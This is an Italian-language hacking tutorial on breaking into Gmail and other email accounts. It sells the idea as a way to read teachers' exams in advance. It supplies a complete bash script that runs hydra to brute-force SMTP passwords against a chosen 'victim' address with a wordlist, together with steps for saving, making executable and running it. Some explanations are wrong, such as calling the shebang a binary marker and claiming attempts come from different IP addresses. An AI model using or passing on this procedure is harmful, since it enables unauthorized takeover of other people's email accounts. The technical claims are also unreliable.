Come hackerare gmail


Perchè? Perchè proprio Gmail? Lo so che vorresti vedere in anticipo i compiti in classe dei vostri professori e... cosa ti devo dire, lo stai facendo nel modo giusto!

Non è una cosa difficile però prima dovrai sapere:

Cos'è una wordlist: Una wordlist è' una lista di parole che potrebbero essere usate come password dalla tua vittima, se vuoi puoi seguire la mia guida su Come creare una wordlist

Cos'è Kali Linux: Kali Linux è una distribuzione basata su Debian GNU/Linux ed è pensata per l'informatica forense e la sicurezza informatica, in particolare per effettuare penetration test.

 



REQUISITI:

 

 

  • Computer con Kali Linux installato
  • Una buona wordlist (vedi Come creare una wordlist

Scarichiamo una wordlist in formato .txt e salviamola sul desktop. (ce ne sono di buone anche già su kali seguendo il percorso: /usr/share/wordlists/

 

Ora attendiamo la fine del processo e avremo la nostra password del server. Di conseguenza potremo avere accesso alla mail.

Ora basterà andare su LeafPad e incollare:

########################################

#! /bin/bash
echo Simple Email Cracking Script in bash
echo Written By: WR3NCH
echo NOTE: Make sure you have wordlists!
echo Let us Begin:
echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:
read smtp
echo Enter Email Address:
read email
echo Provide Directory of Wordlist for Passwords:
read wordlist

hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp

###########################################################

 

Salvatelo in root>mailcrack.sh

 

Aprite il terminale e date l'autorizzazione con:

 

chmod a+x mailcrack.sh

Ora avviamolo con:

 

cd "percorso file" (non necessario se salvato in "root")

./mailcrack.sh

 

Inseriamo server SMTP:

la mail da hackerare:

il percorso della wordlist:

 

MA SPIEGHIAMO IL CODICE

 

#! /bin/bash = Da l'informazione alla macchina che quello che sta eseguendo è un file binario

 

read = dice di leggere ciò che ha scritto l'utente

 

hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp = da il comando di hydra, Dove $ da l'informazione alla macchina di inserire ciò che è espresso da read.

 

Fatto! Ora tutte le password verranno testate automaticamente da indirizzi ip differenti. Ora incrociamo le dita e speriamo che una di queste password sia quella corretta!